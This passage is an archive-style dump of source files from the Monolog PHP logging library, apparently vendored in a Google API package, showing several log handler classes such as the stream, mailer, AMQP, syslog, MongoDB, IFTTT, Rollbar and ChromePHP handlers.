null, 'password' => null, ], $options); parent::__construct($level, $bubble); } /** * {@inheritDoc} */ protected function write(array $record): void { $basicAuth = null; if ($this->options['username']) { $basicAuth = sprintf('%s:%s@', $this->options['username'], $this->options['password']); } $url = 'http://'.$basicAuth.$this->options['host'].':'.$this->options['port'].'/'.$this->options['dbname']; $context = stream_context_create([ 'http' => [ 'method' => 'POST', 'content' => $record['formatted'], 'ignore_errors' => true, 'max_redirects' => 0, 'header' => 'Content-type: application/json', ], ]); if (false === @file_get_contents($url, false, $context)) { throw new \RuntimeException(sprintf('Could not connect to %s', $url)); } } /** * {@inheritDoc} */ protected function getDefaultFormatter(): FormatterInterface { return new JsonFormatter(JsonFormatter::BATCH_MODE_JSON, false); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/ErrorLogHandler.php000064400000005033147600400120022523 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Formatter\LineFormatter; use Monolog\Formatter\FormatterInterface; use Monolog\Logger; use Monolog\Utils; /** * Stores to PHP error_log() handler. * * @author Elan Ruusamäe */ class ErrorLogHandler extends AbstractProcessingHandler { public const OPERATING_SYSTEM = 0; public const SAPI = 4; /** @var int */ protected $messageType; /** @var bool */ protected $expandNewlines; /** * @param int $messageType Says where the error should go. * @param bool $expandNewlines If set to true, newlines in the message will be expanded to be take multiple log entries */ public function __construct(int $messageType = self::OPERATING_SYSTEM, $level = Logger::DEBUG, bool $bubble = true, bool $expandNewlines = false) { parent::__construct($level, $bubble); if (false === in_array($messageType, self::getAvailableTypes(), true)) { $message = sprintf('The given message type "%s" is not supported', print_r($messageType, true)); throw new \InvalidArgumentException($message); } $this->messageType = $messageType; $this->expandNewlines = $expandNewlines; } /** * @return int[] With all available types */ public static function getAvailableTypes(): array { return [ self::OPERATING_SYSTEM, self::SAPI, ]; } /** * {@inheritDoc} */ protected function getDefaultFormatter(): FormatterInterface { return new LineFormatter('[%datetime%] %channel%.%level_name%: %message% %context% %extra%'); } /** * {@inheritDoc} */ protected function write(array $record): void { if (!$this->expandNewlines) { error_log((string) $record['formatted'], $this->messageType); return; } $lines = preg_split('{[\r\n]+}', (string) $record['formatted']); if ($lines === false) { $pcreErrorCode = preg_last_error(); throw new \RuntimeException('Failed to preg_split formatted string: ' . $pcreErrorCode . ' / '. Utils::pcreLastErrorMessage($pcreErrorCode)); } foreach ($lines as $line) { error_log($line, $this->messageType); } } } google-api/vendor/monolog/monolog/src/Monolog/Handler/AmqpHandler.php000064400000011755147600400120021676 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Monolog\Formatter\FormatterInterface; use Monolog\Formatter\JsonFormatter; use PhpAmqpLib\Message\AMQPMessage; use PhpAmqpLib\Channel\AMQPChannel; use AMQPExchange; /** * @phpstan-import-type Record from \Monolog\Logger */ class AmqpHandler extends AbstractProcessingHandler { /** * @var AMQPExchange|AMQPChannel $exchange */ protected $exchange; /** @var array */ private $extraAttributes = []; /** * @return array */ public function getExtraAttributes(): array { return $this->extraAttributes; } /** * Configure extra attributes to pass to the AMQPExchange (if you are using the amqp extension) * * @param array $extraAttributes One of content_type, content_encoding, * message_id, user_id, app_id, delivery_mode, * priority, timestamp, expiration, type * or reply_to, headers. * @return AmqpHandler */ public function setExtraAttributes(array $extraAttributes): self { $this->extraAttributes = $extraAttributes; return $this; } /** * @var string */ protected $exchangeName; /** * @param AMQPExchange|AMQPChannel $exchange AMQPExchange (php AMQP ext) or PHP AMQP lib channel, ready for use * @param string|null $exchangeName Optional exchange name, for AMQPChannel (PhpAmqpLib) only */ public function __construct($exchange, ?string $exchangeName = null, $level = Logger::DEBUG, bool $bubble = true) { if ($exchange instanceof AMQPChannel) { $this->exchangeName = (string) $exchangeName; } elseif (!$exchange instanceof AMQPExchange) { throw new \InvalidArgumentException('PhpAmqpLib\Channel\AMQPChannel or AMQPExchange instance required'); } elseif ($exchangeName) { @trigger_error('The $exchangeName parameter can only be passed when using PhpAmqpLib, if using an AMQPExchange instance configure it beforehand', E_USER_DEPRECATED); } $this->exchange = $exchange; parent::__construct($level, $bubble); } /** * {@inheritDoc} */ protected function write(array $record): void { $data = $record["formatted"]; $routingKey = $this->getRoutingKey($record); if ($this->exchange instanceof AMQPExchange) { $attributes = [ 'delivery_mode' => 2, 'content_type' => 'application/json', ]; if ($this->extraAttributes) { $attributes = array_merge($attributes, $this->extraAttributes); } $this->exchange->publish( $data, $routingKey, 0, $attributes ); } else { $this->exchange->basic_publish( $this->createAmqpMessage($data), $this->exchangeName, $routingKey ); } } /** * {@inheritDoc} */ public function handleBatch(array $records): void { if ($this->exchange instanceof AMQPExchange) { parent::handleBatch($records); return; } foreach ($records as $record) { if (!$this->isHandling($record)) { continue; } /** @var Record $record */ $record = $this->processRecord($record); $data = $this->getFormatter()->format($record); $this->exchange->batch_basic_publish( $this->createAmqpMessage($data), $this->exchangeName, $this->getRoutingKey($record) ); } $this->exchange->publish_batch(); } /** * Gets the routing key for the AMQP exchange * * @phpstan-param Record $record */ protected function getRoutingKey(array $record): string { $routingKey = sprintf('%s.%s', $record['level_name'], $record['channel']); return strtolower($routingKey); } private function createAmqpMessage(string $data): AMQPMessage { $attributes = [ 'delivery_mode' => 2, 'content_type' => 'application/json', ]; if ($this->extraAttributes) { $attributes = array_merge($attributes, $this->extraAttributes); } return new AMQPMessage($data, $attributes); } /** * {@inheritDoc} */ protected function getDefaultFormatter(): FormatterInterface { return new JsonFormatter(JsonFormatter::BATCH_MODE_JSON, false); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/NativeMailerHandler.php000064400000011553147600400120023354 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Monolog\Formatter\LineFormatter; /** * NativeMailerHandler uses the mail() function to send the emails * * @author Christophe Coevoet * @author Mark Garrett */ class NativeMailerHandler extends MailHandler { /** * The email addresses to which the message will be sent * @var string[] */ protected $to; /** * The subject of the email * @var string */ protected $subject; /** * Optional headers for the message * @var string[] */ protected $headers = []; /** * Optional parameters for the message * @var string[] */ protected $parameters = []; /** * The wordwrap length for the message * @var int */ protected $maxColumnWidth; /** * The Content-type for the message * @var string|null */ protected $contentType; /** * The encoding for the message * @var string */ protected $encoding = 'utf-8'; /** * @param string|string[] $to The receiver of the mail * @param string $subject The subject of the mail * @param string $from The sender of the mail * @param int $maxColumnWidth The maximum column width that the message lines will have */ public function __construct($to, string $subject, string $from, $level = Logger::ERROR, bool $bubble = true, int $maxColumnWidth = 70) { parent::__construct($level, $bubble); $this->to = (array) $to; $this->subject = $subject; $this->addHeader(sprintf('From: %s', $from)); $this->maxColumnWidth = $maxColumnWidth; } /** * Add headers to the message * * @param string|string[] $headers Custom added headers */ public function addHeader($headers): self { foreach ((array) $headers as $header) { if (strpos($header, "\n") !== false || strpos($header, "\r") !== false) { throw new \InvalidArgumentException('Headers can not contain newline characters for security reasons'); } $this->headers[] = $header; } return $this; } /** * Add parameters to the message * * @param string|string[] $parameters Custom added parameters */ public function addParameter($parameters): self { $this->parameters = array_merge($this->parameters, (array) $parameters); return $this; } /** * {@inheritDoc} */ protected function send(string $content, array $records): void { $contentType = $this->getContentType() ?: ($this->isHtmlBody($content) ? 'text/html' : 'text/plain'); if ($contentType !== 'text/html') { $content = wordwrap($content, $this->maxColumnWidth); } $headers = ltrim(implode("\r\n", $this->headers) . "\r\n", "\r\n"); $headers .= 'Content-type: ' . $contentType . '; charset=' . $this->getEncoding() . "\r\n"; if ($contentType === 'text/html' && false === strpos($headers, 'MIME-Version:')) { $headers .= 'MIME-Version: 1.0' . "\r\n"; } $subject = $this->subject; if ($records) { $subjectFormatter = new LineFormatter($this->subject); $subject = $subjectFormatter->format($this->getHighestRecord($records)); } $parameters = implode(' ', $this->parameters); foreach ($this->to as $to) { mail($to, $subject, $content, $headers, $parameters); } } public function getContentType(): ?string { return $this->contentType; } public function getEncoding(): string { return $this->encoding; } /** * @param string $contentType The content type of the email - Defaults to text/plain. Use text/html for HTML messages. */ public function setContentType(string $contentType): self { if (strpos($contentType, "\n") !== false || strpos($contentType, "\r") !== false) { throw new \InvalidArgumentException('The content type can not contain newline characters to prevent email header injection'); } $this->contentType = $contentType; return $this; } public function setEncoding(string $encoding): self { if (strpos($encoding, "\n") !== false || strpos($encoding, "\r") !== false) { throw new \InvalidArgumentException('The encoding can not contain newline characters to prevent email header injection'); } $this->encoding = $encoding; return $this; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/AbstractSyslogHandler.php000064400000006724147600400120023744 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Monolog\Formatter\FormatterInterface; use Monolog\Formatter\LineFormatter; /** * Common syslog functionality * * @phpstan-import-type Level from \Monolog\Logger */ abstract class AbstractSyslogHandler extends AbstractProcessingHandler { /** @var int */ protected $facility; /** * Translates Monolog log levels to syslog log priorities. * @var array * @phpstan-var array */ protected $logLevels = [ Logger::DEBUG => LOG_DEBUG, Logger::INFO => LOG_INFO, Logger::NOTICE => LOG_NOTICE, Logger::WARNING => LOG_WARNING, Logger::ERROR => LOG_ERR, Logger::CRITICAL => LOG_CRIT, Logger::ALERT => LOG_ALERT, Logger::EMERGENCY => LOG_EMERG, ]; /** * List of valid log facility names. * @var array */ protected $facilities = [ 'auth' => LOG_AUTH, 'authpriv' => LOG_AUTHPRIV, 'cron' => LOG_CRON, 'daemon' => LOG_DAEMON, 'kern' => LOG_KERN, 'lpr' => LOG_LPR, 'mail' => LOG_MAIL, 'news' => LOG_NEWS, 'syslog' => LOG_SYSLOG, 'user' => LOG_USER, 'uucp' => LOG_UUCP, ]; /** * @param string|int $facility Either one of the names of the keys in $this->facilities, or a LOG_* facility constant */ public function __construct($facility = LOG_USER, $level = Logger::DEBUG, bool $bubble = true) { parent::__construct($level, $bubble); if (!defined('PHP_WINDOWS_VERSION_BUILD')) { $this->facilities['local0'] = LOG_LOCAL0; $this->facilities['local1'] = LOG_LOCAL1; $this->facilities['local2'] = LOG_LOCAL2; $this->facilities['local3'] = LOG_LOCAL3; $this->facilities['local4'] = LOG_LOCAL4; $this->facilities['local5'] = LOG_LOCAL5; $this->facilities['local6'] = LOG_LOCAL6; $this->facilities['local7'] = LOG_LOCAL7; } else { $this->facilities['local0'] = 128; // LOG_LOCAL0 $this->facilities['local1'] = 136; // LOG_LOCAL1 $this->facilities['local2'] = 144; // LOG_LOCAL2 $this->facilities['local3'] = 152; // LOG_LOCAL3 $this->facilities['local4'] = 160; // LOG_LOCAL4 $this->facilities['local5'] = 168; // LOG_LOCAL5 $this->facilities['local6'] = 176; // LOG_LOCAL6 $this->facilities['local7'] = 184; // LOG_LOCAL7 } // convert textual description of facility to syslog constant if (is_string($facility) && array_key_exists(strtolower($facility), $this->facilities)) { $facility = $this->facilities[strtolower($facility)]; } elseif (!in_array($facility, array_values($this->facilities), true)) { throw new \UnexpectedValueException('Unknown facility value "'.$facility.'" given'); } $this->facility = $facility; } /** * {@inheritDoc} */ protected function getDefaultFormatter(): FormatterInterface { return new LineFormatter('%channel%.%level_name%: %message% %context% %extra%'); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/StreamHandler.php000064400000015626147600400120022234 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Monolog\Utils; /** * Stores to any stream resource * * Can be used to store into php://stderr, remote and local files, etc. * * @author Jordi Boggiano * * @phpstan-import-type FormattedRecord from AbstractProcessingHandler */ class StreamHandler extends AbstractProcessingHandler { /** @const int */ protected const MAX_CHUNK_SIZE = 2147483647; /** @const int 10MB */ protected const DEFAULT_CHUNK_SIZE = 10 * 1024 * 1024; /** @var int */ protected $streamChunkSize; /** @var resource|null */ protected $stream; /** @var ?string */ protected $url = null; /** @var ?string */ private $errorMessage = null; /** @var ?int */ protected $filePermission; /** @var bool */ protected $useLocking; /** @var true|null */ private $dirCreated = null; /** * @param resource|string $stream If a missing path can't be created, an UnexpectedValueException will be thrown on first write * @param int|null $filePermission Optional file permissions (default (0644) are only for owner read/write) * @param bool $useLocking Try to lock log file before doing any writes * * @throws \InvalidArgumentException If stream is not a resource or string */ public function __construct($stream, $level = Logger::DEBUG, bool $bubble = true, ?int $filePermission = null, bool $useLocking = false) { parent::__construct($level, $bubble); if (($phpMemoryLimit = Utils::expandIniShorthandBytes(ini_get('memory_limit'))) !== false) { if ($phpMemoryLimit > 0) { // use max 10% of allowed memory for the chunk size, and at least 100KB $this->streamChunkSize = min(static::MAX_CHUNK_SIZE, max((int) ($phpMemoryLimit / 10), 100 * 1024)); } else { // memory is unlimited, set to the default 10MB $this->streamChunkSize = static::DEFAULT_CHUNK_SIZE; } } else { // no memory limit information, set to the default 10MB $this->streamChunkSize = static::DEFAULT_CHUNK_SIZE; } if (is_resource($stream)) { $this->stream = $stream; stream_set_chunk_size($this->stream, $this->streamChunkSize); } elseif (is_string($stream)) { $this->url = Utils::canonicalizePath($stream); } else { throw new \InvalidArgumentException('A stream must either be a resource or a string.'); } $this->filePermission = $filePermission; $this->useLocking = $useLocking; } /** * {@inheritDoc} */ public function close(): void { if ($this->url && is_resource($this->stream)) { fclose($this->stream); } $this->stream = null; $this->dirCreated = null; } /** * Return the currently active stream if it is open * * @return resource|null */ public function getStream() { return $this->stream; } /** * Return the stream URL if it was configured with a URL and not an active resource * * @return string|null */ public function getUrl(): ?string { return $this->url; } /** * @return int */ public function getStreamChunkSize(): int { return $this->streamChunkSize; } /** * {@inheritDoc} */ protected function write(array $record): void { if (!is_resource($this->stream)) { $url = $this->url; if (null === $url || '' === $url) { throw new \LogicException('Missing stream url, the stream can not be opened. This may be caused by a premature call to close().' . Utils::getRecordMessageForException($record)); } $this->createDir($url); $this->errorMessage = null; set_error_handler([$this, 'customErrorHandler']); try { $stream = fopen($url, 'a'); if ($this->filePermission !== null) { @chmod($url, $this->filePermission); } } finally { restore_error_handler(); } if (!is_resource($stream)) { $this->stream = null; throw new \UnexpectedValueException(sprintf('The stream or file "%s" could not be opened in append mode: '.$this->errorMessage, $url) . Utils::getRecordMessageForException($record)); } stream_set_chunk_size($stream, $this->streamChunkSize); $this->stream = $stream; } $stream = $this->stream; if (!is_resource($stream)) { throw new \LogicException('No stream was opened yet' . Utils::getRecordMessageForException($record)); } if ($this->useLocking) { // ignoring errors here, there's not much we can do about them flock($stream, LOCK_EX); } $this->streamWrite($stream, $record); if ($this->useLocking) { flock($stream, LOCK_UN); } } /** * Write to stream * @param resource $stream * @param array $record * * @phpstan-param FormattedRecord $record */ protected function streamWrite($stream, array $record): void { fwrite($stream, (string) $record['formatted']); } private function customErrorHandler(int $code, string $msg): bool { $this->errorMessage = preg_replace('{^(fopen|mkdir)\(.*?\): }', '', $msg); return true; } private function getDirFromStream(string $stream): ?string { $pos = strpos($stream, '://'); if ($pos === false) { return dirname($stream); } if ('file://' === substr($stream, 0, 7)) { return dirname(substr($stream, 7)); } return null; } private function createDir(string $url): void { // Do not try to create dir if it has already been tried. if ($this->dirCreated) { return; } $dir = $this->getDirFromStream($url); if (null !== $dir && !is_dir($dir)) { $this->errorMessage = null; set_error_handler([$this, 'customErrorHandler']); $status = mkdir($dir, 0777, true); restore_error_handler(); if (false === $status && !is_dir($dir) && strpos((string) $this->errorMessage, 'File exists') === false) { throw new \UnexpectedValueException(sprintf('There is no existing directory at "%s" and it could not be created: '.$this->errorMessage, $dir)); } } $this->dirCreated = true; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/MongoDBHandler.php000064400000004761147600400120022264 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use MongoDB\Driver\BulkWrite; use MongoDB\Driver\Manager; use MongoDB\Client; use Monolog\Logger; use Monolog\Formatter\FormatterInterface; use Monolog\Formatter\MongoDBFormatter; /** * Logs to a MongoDB database. * * Usage example: * * $log = new \Monolog\Logger('application'); * $client = new \MongoDB\Client('mongodb://localhost:27017'); * $mongodb = new \Monolog\Handler\MongoDBHandler($client, 'logs', 'prod'); * $log->pushHandler($mongodb); * * The above examples uses the MongoDB PHP library's client class; however, the * MongoDB\Driver\Manager class from ext-mongodb is also supported. */ class MongoDBHandler extends AbstractProcessingHandler { /** @var \MongoDB\Collection */ private $collection; /** @var Client|Manager */ private $manager; /** @var string */ private $namespace; /** * Constructor. * * @param Client|Manager $mongodb MongoDB library or driver client * @param string $database Database name * @param string $collection Collection name */ public function __construct($mongodb, string $database, string $collection, $level = Logger::DEBUG, bool $bubble = true) { if (!($mongodb instanceof Client || $mongodb instanceof Manager)) { throw new \InvalidArgumentException('MongoDB\Client or MongoDB\Driver\Manager instance required'); } if ($mongodb instanceof Client) { $this->collection = $mongodb->selectCollection($database, $collection); } else { $this->manager = $mongodb; $this->namespace = $database . '.' . $collection; } parent::__construct($level, $bubble); } protected function write(array $record): void { if (isset($this->collection)) { $this->collection->insertOne($record['formatted']); } if (isset($this->manager, $this->namespace)) { $bulk = new BulkWrite; $bulk->insert($record["formatted"]); $this->manager->executeBulkWrite($this->namespace, $bulk); } } /** * {@inheritDoc} */ protected function getDefaultFormatter(): FormatterInterface { return new MongoDBFormatter; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/SymfonyMailerHandler.php000064400000006715147600400120023576 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Monolog\Utils; use Monolog\Formatter\FormatterInterface; use Monolog\Formatter\LineFormatter; use Symfony\Component\Mailer\MailerInterface; use Symfony\Component\Mailer\Transport\TransportInterface; use Symfony\Component\Mime\Email; /** * SymfonyMailerHandler uses Symfony's Mailer component to send the emails * * @author Jordi Boggiano * * @phpstan-import-type Record from \Monolog\Logger */ class SymfonyMailerHandler extends MailHandler { /** @var MailerInterface|TransportInterface */ protected $mailer; /** @var Email|callable(string, Record[]): Email */ private $emailTemplate; /** * @psalm-param Email|callable(string, Record[]): Email $email * * @param MailerInterface|TransportInterface $mailer The mailer to use * @param callable|Email $email An email template, the subject/body will be replaced */ public function __construct($mailer, $email, $level = Logger::ERROR, bool $bubble = true) { parent::__construct($level, $bubble); $this->mailer = $mailer; $this->emailTemplate = $email; } /** * {@inheritDoc} */ protected function send(string $content, array $records): void { $this->mailer->send($this->buildMessage($content, $records)); } /** * Gets the formatter for the Swift_Message subject. * * @param string|null $format The format of the subject */ protected function getSubjectFormatter(?string $format): FormatterInterface { return new LineFormatter($format); } /** * Creates instance of Email to be sent * * @param string $content formatted email body to be sent * @param array $records Log records that formed the content * * @phpstan-param Record[] $records */ protected function buildMessage(string $content, array $records): Email { $message = null; if ($this->emailTemplate instanceof Email) { $message = clone $this->emailTemplate; } elseif (is_callable($this->emailTemplate)) { $message = ($this->emailTemplate)($content, $records); } if (!$message instanceof Email) { $record = reset($records); throw new \InvalidArgumentException('Could not resolve message as instance of Email or a callable returning it' . ($record ? Utils::getRecordMessageForException($record) : '')); } if ($records) { $subjectFormatter = $this->getSubjectFormatter($message->getSubject()); $message->subject($subjectFormatter->format($this->getHighestRecord($records))); } if ($this->isHtmlBody($content)) { if (null !== ($charset = $message->getHtmlCharset())) { $message->html($content, $charset); } else { $message->html($content); } } else { if (null !== ($charset = $message->getTextCharset())) { $message->text($content, $charset); } else { $message->text($content); } } return $message->date(new \DateTimeImmutable()); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/IFTTTHandler.php000064400000004207147600400120021664 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Monolog\Utils; /** * IFTTTHandler uses cURL to trigger IFTTT Maker actions * * Register a secret key and trigger/event name at https://ifttt.com/maker * * value1 will be the channel from monolog's Logger constructor, * value2 will be the level name (ERROR, WARNING, ..) * value3 will be the log record's message * * @author Nehal Patel */ class IFTTTHandler extends AbstractProcessingHandler { /** @var string */ private $eventName; /** @var string */ private $secretKey; /** * @param string $eventName The name of the IFTTT Maker event that should be triggered * @param string $secretKey A valid IFTTT secret key */ public function __construct(string $eventName, string $secretKey, $level = Logger::ERROR, bool $bubble = true) { if (!extension_loaded('curl')) { throw new MissingExtensionException('The curl extension is needed to use the IFTTTHandler'); } $this->eventName = $eventName; $this->secretKey = $secretKey; parent::__construct($level, $bubble); } /** * {@inheritDoc} */ public function write(array $record): void { $postData = [ "value1" => $record["channel"], "value2" => $record["level_name"], "value3" => $record["message"], ]; $postString = Utils::jsonEncode($postData); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "https://maker.ifttt.com/trigger/" . $this->eventName . "/with/key/" . $this->secretKey); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $postString); curl_setopt($ch, CURLOPT_HTTPHEADER, [ "Content-Type: application/json", ]); Curl\Util::execute($ch); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/RollbarHandler.php000064400000006524147600400120022373 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Rollbar\RollbarLogger; use Throwable; use Monolog\Logger; /** * Sends errors to Rollbar * * If the context data contains a `payload` key, that is used as an array * of payload options to RollbarLogger's log method. * * Rollbar's context info will contain the context + extra keys from the log record * merged, and then on top of that a few keys: * * - level (rollbar level name) * - monolog_level (monolog level name, raw level, as rollbar only has 5 but monolog 8) * - channel * - datetime (unix timestamp) * * @author Paul Statezny */ class RollbarHandler extends AbstractProcessingHandler { /** * @var RollbarLogger */ protected $rollbarLogger; /** @var string[] */ protected $levelMap = [ Logger::DEBUG => 'debug', Logger::INFO => 'info', Logger::NOTICE => 'info', Logger::WARNING => 'warning', Logger::ERROR => 'error', Logger::CRITICAL => 'critical', Logger::ALERT => 'critical', Logger::EMERGENCY => 'critical', ]; /** * Records whether any log records have been added since the last flush of the rollbar notifier * * @var bool */ private $hasRecords = false; /** @var bool */ protected $initialized = false; /** * @param RollbarLogger $rollbarLogger RollbarLogger object constructed with valid token */ public function __construct(RollbarLogger $rollbarLogger, $level = Logger::ERROR, bool $bubble = true) { $this->rollbarLogger = $rollbarLogger; parent::__construct($level, $bubble); } /** * {@inheritDoc} */ protected function write(array $record): void { if (!$this->initialized) { // __destructor() doesn't get called on Fatal errors register_shutdown_function(array($this, 'close')); $this->initialized = true; } $context = $record['context']; $context = array_merge($context, $record['extra'], [ 'level' => $this->levelMap[$record['level']], 'monolog_level' => $record['level_name'], 'channel' => $record['channel'], 'datetime' => $record['datetime']->format('U'), ]); if (isset($context['exception']) && $context['exception'] instanceof Throwable) { $exception = $context['exception']; unset($context['exception']); $toLog = $exception; } else { $toLog = $record['message']; } // @phpstan-ignore-next-line $this->rollbarLogger->log($context['level'], $toLog, $context); $this->hasRecords = true; } public function flush(): void { if ($this->hasRecords) { $this->rollbarLogger->flush(); $this->hasRecords = false; } } /** * {@inheritDoc} */ public function close(): void { $this->flush(); } /** * {@inheritDoc} */ public function reset() { $this->flush(); parent::reset(); } } google-api/vendor/monolog/monolog/src/Monolog/Handler/Handler.php000064400000002337147600400120021053 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; /** * Base Handler class providing basic close() support as well as handleBatch * * @author Jordi Boggiano */ abstract class Handler implements HandlerInterface { /** * {@inheritDoc} */ public function handleBatch(array $records): void { foreach ($records as $record) { $this->handle($record); } } /** * {@inheritDoc} */ public function close(): void { } public function __destruct() { try { $this->close(); } catch (\Throwable $e) { // do nothing } } public function __sleep() { $this->close(); $reflClass = new \ReflectionClass($this); $keys = []; foreach ($reflClass->getProperties() as $reflProp) { if (!$reflProp->isStatic()) { $keys[] = $reflProp->getName(); } } return $keys; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/NullHandler.php000064400000002471147600400120021705 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Logger; use Psr\Log\LogLevel; /** * Blackhole * * Any record it can handle will be thrown away. This can be used * to put on top of an existing stack to override it temporarily. * * @author Jordi Boggiano * * @phpstan-import-type Level from \Monolog\Logger * @phpstan-import-type LevelName from \Monolog\Logger */ class NullHandler extends Handler { /** * @var int */ private $level; /** * @param string|int $level The minimum logging level at which this handler will be triggered * * @phpstan-param Level|LevelName|LogLevel::* $level */ public function __construct($level = Logger::DEBUG) { $this->level = Logger::toMonologLevel($level); } /** * {@inheritDoc} */ public function isHandling(array $record): bool { return $record['level'] >= $this->level; } /** * {@inheritDoc} */ public function handle(array $record): bool { return $record['level'] >= $this->level; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/ChromePHPHandler.php000064400000012202147600400120022551 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Formatter\ChromePHPFormatter; use Monolog\Formatter\FormatterInterface; use Monolog\Logger; use Monolog\Utils; /** * Handler sending logs to the ChromePHP extension (http://www.chromephp.com/) * * This also works out of the box with Firefox 43+ * * @author Christophe Coevoet * * @phpstan-import-type Record from \Monolog\Logger */ class ChromePHPHandler extends AbstractProcessingHandler { use WebRequestRecognizerTrait; /** * Version of the extension */ protected const VERSION = '4.0'; /** * Header name */ protected const HEADER_NAME = 'X-ChromeLogger-Data'; /** * Regular expression to detect supported browsers (matches any Chrome, or Firefox 43+) */ protected const USER_AGENT_REGEX = '{\b(?:Chrome/\d+(?:\.\d+)*|HeadlessChrome|Firefox/(?:4[3-9]|[5-9]\d|\d{3,})(?:\.\d)*)\b}'; /** @var bool */ protected static $initialized = false; /** * Tracks whether we sent too much data * * Chrome limits the headers to 4KB, so when we sent 3KB we stop sending * * @var bool */ protected static $overflowed = false; /** @var mixed[] */ protected static $json = [ 'version' => self::VERSION, 'columns' => ['label', 'log', 'backtrace', 'type'], 'rows' => [], ]; /** @var bool */ protected static $sendHeaders = true; public function __construct($level = Logger::DEBUG, bool $bubble = true) { parent::__construct($level, $bubble); if (!function_exists('json_encode')) { throw new \RuntimeException('PHP\'s json extension is required to use Monolog\'s ChromePHPHandler'); } } /** * {@inheritDoc} */ public function handleBatch(array $records): void { if (!$this->isWebRequest()) { return; } $messages = []; foreach ($records as $record) { if ($record['level'] < $this->level) { continue; } /** @var Record $message */ $message = $this->processRecord($record); $messages[] = $message; } if (!empty($messages)) { $messages = $this->getFormatter()->formatBatch($messages); self::$json['rows'] = array_merge(self::$json['rows'], $messages); $this->send(); } } /** * {@inheritDoc} */ protected function getDefaultFormatter(): FormatterInterface { return new ChromePHPFormatter(); } /** * Creates & sends header for a record * * @see sendHeader() * @see send() */ protected function write(array $record): void { if (!$this->isWebRequest()) { return; } self::$json['rows'][] = $record['formatted']; $this->send(); } /** * Sends the log header * * @see sendHeader() */ protected function send(): void { if (self::$overflowed || !self::$sendHeaders) { return; } if (!self::$initialized) { self::$initialized = true; self::$sendHeaders = $this->headersAccepted(); if (!self::$sendHeaders) { return; } self::$json['request_uri'] = $_SERVER['REQUEST_URI'] ?? ''; } $json = Utils::jsonEncode(self::$json, Utils::DEFAULT_JSON_FLAGS & ~JSON_UNESCAPED_UNICODE, true); $data = base64_encode($json); if (strlen($data) > 3 * 1024) { self::$overflowed = true; $record = [ 'message' => 'Incomplete logs, chrome header size limit reached', 'context' => [], 'level' => Logger::WARNING, 'level_name' => Logger::getLevelName(Logger::WARNING), 'channel' => 'monolog', 'datetime' => new \DateTimeImmutable(), 'extra' => [], ]; self::$json['rows'][count(self::$json['rows']) - 1] = $this->getFormatter()->format($record); $json = Utils::jsonEncode(self::$json, Utils::DEFAULT_JSON_FLAGS & ~JSON_UNESCAPED_UNICODE, true); $data = base64_encode($json); } if (trim($data) !== '') { $this->sendHeader(static::HEADER_NAME, $data); } } /** * Send header string to the client */ protected function sendHeader(string $header, string $content): void { if (!headers_sent() && self::$sendHeaders) { header(sprintf('%s: %s', $header, $content)); } } /** * Verifies if the headers are accepted by the current user agent */ protected function headersAccepted(): bool { if (empty($_SERVER['HTTP_USER_AGENT'])) { return false; } return preg_match(static::USER_AGENT_REGEX, $_SERVER['HTTP_USER_AGENT']) === 1; } } google-api/vendor/monolog/monolog/src/Monolog/Handler/SlackHandler.php000064400000015554147600400120022036 0ustar00 * * For the full copyright and license information, please view the LICENSE * file that was distributed with this source code. */ namespace Monolog\Handler; use Monolog\Formatter\FormatterInterface; use Monolog\Logger; use Monolog\Utils; use Monolog\Handler\Slack\SlackRecord; /** * Sends notifications through Slack API * * @author Greg Kedzierski * @see https://api.slack.com/ * * @phpstan-import-type FormattedRecord from AbstractProcessingHandler */ class SlackHandler extends SocketHandler { /** * Slack API token * @var string */ private $token; /** * Instance of the SlackRecord util class preparing data for Slack API. * @var SlackRecord */ private $slackRecord; /** * @param string $token Slack API token * @param string $channel Slack channel (encoded ID or name) * @param string|null $username Name of a bot * @param bool $useAttachment Whether the message should be added to Slack as attachment (plain text otherwise) * @param string|null $iconEmoji The emoji name to use (or null) * @param bool $useShortAttachment Whether the context/extra messages added to Slack as attachments are in a short style * @param bool $includeContextAndExtra Whether the attachment should include context and extra data * @param string[] $excludeFields Dot separated list of fields to exclude from slack message. E.g. ['context.field1', 'extra.field2'] * @throws MissingExtensionException If no OpenSSL PHP extension configured */ public function __construct( string $token, string $channel, ?string $username = null, bool $useAttachment = true, ?string $iconEmoji = null, $level = Logger::CRITICAL, bool $bubble = true, bool $useShortAttachment = false, bool $includeContextAndExtra = false, array $excludeFields = array(), bool $persistent = false, float $timeout = 0.0, float $writingTimeout = 10.0, ?float 